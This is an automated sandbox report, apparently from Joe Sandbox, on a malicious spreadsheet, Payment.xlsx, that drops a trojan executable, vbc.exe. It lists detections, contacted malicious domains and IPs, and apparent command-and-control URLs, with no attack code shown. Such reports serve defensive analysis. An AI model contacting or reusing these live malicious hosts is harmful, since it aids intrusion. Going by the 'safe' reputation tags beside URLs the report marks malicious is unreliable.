
          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe13%ReversingLabsWin32.Dropper.Convagent
          C:\Users\Public\vbc.exe13%ReversingLabsWin32.Dropper.Convagent

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg==0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.churchsw.org/church-projector-project0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy200%Avira URL Cloudsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.churchsw.org/repository/Bibles/0%Avira URL Cloudsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy200%Avira URL Cloudsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.discjockeydelraybeach.com
          		108.177.174.182
          		truetrue
            		unknown
            will.kasraz.com
            		192.3.122.177
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		198.54.117.210
              		truefalse
                		high
                burundiacademyst.com
                		66.235.200.147
                		truetrue
                  		unknown
                  www.arfjkacsgatfzbazpdth.com
                  		103.5.116.132
                  		truetrue
                    		unknown
                    cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                    		54.156.162.121
                    		truefalse
                      		high
                      www.pipienta.com
                      		157.7.107.165
                      		truetrue
                        		unknown
                        www.burundiacademyst.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.girlboyfriends.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.donelys.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://search.ebay.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.mtv.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.rambler.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://buscar.ya.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://asp.usatoday.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://rover.ebay.comexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://search.ebay.in/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.churchsw.org/church-projector-projectvbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://%s.comexplorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		low
                                                            http://msk.afisha.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://search.rediff.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://search.naver.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.google.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://search.daum.net/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.churchsw.org/repository/Bibles/vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://buscar.ozu.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.about.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.ask.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.cjmall.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://search.centrum.cz/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://suche.t-online.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.google.it/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://search.auction.co.kr/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.ceneo.pl/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.amazon.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://sads.myspace.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://search.sify.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.ebay.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://search.nifty.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.google.si/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.google.cz/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.soso.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.univision.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.ebay.it/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              192.3.122.177
                                                                                                                                                              		will.kasraz.comUnited States
                                                                                                                                                              		36352AS-COLOCROSSINGUStrue
                                                                                                                                                              54.156.162.121
                                                                                                                                                              		cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                              103.5.116.132
                                                                                                                                                              		www.arfjkacsgatfzbazpdth.comJapan17408ABOVE-AS-APAboveNetCommunicationsTaiwanTWtrue
                                                                                                                                                              157.7.107.165
                                                                                                                                                              		www.pipienta.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                              198.54.117.210
                                                                                                                                                              		parkingpage.namecheap.comUnited States
                                                                                                                                                              		22612NAMECHEAP-NETUSfalse
                                                                                                                                                              108.177.174.182
                                                                                                                                                              		www.discjockeydelraybeach.comUnited States
                                                                                                                                                              		395954LEASEWEB-USA-LAX-11UStrue
                                                                                                                                                              66.235.200.147
                                                                                                                                                              		burundiacademyst.comUnited States
                                                                                                                                                              		13335CLOUDFLARENETUStrue

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                              Analysis ID:404048
                                                                                                                                                              Start date:04.05.2021
                                                                                                                                                              Start time:16:57:27
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 13m 26s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Sample file name:Payment.xlsx
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                              Number of analysed new started processes analysed:11
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSX@14/8@7/7
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 27.1% (good quality ratio 25.8%)
                                                                                                                                                              • Quality average: 72.6%
                                                                                                                                                              • Quality standard deviation: 28.1%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 97%
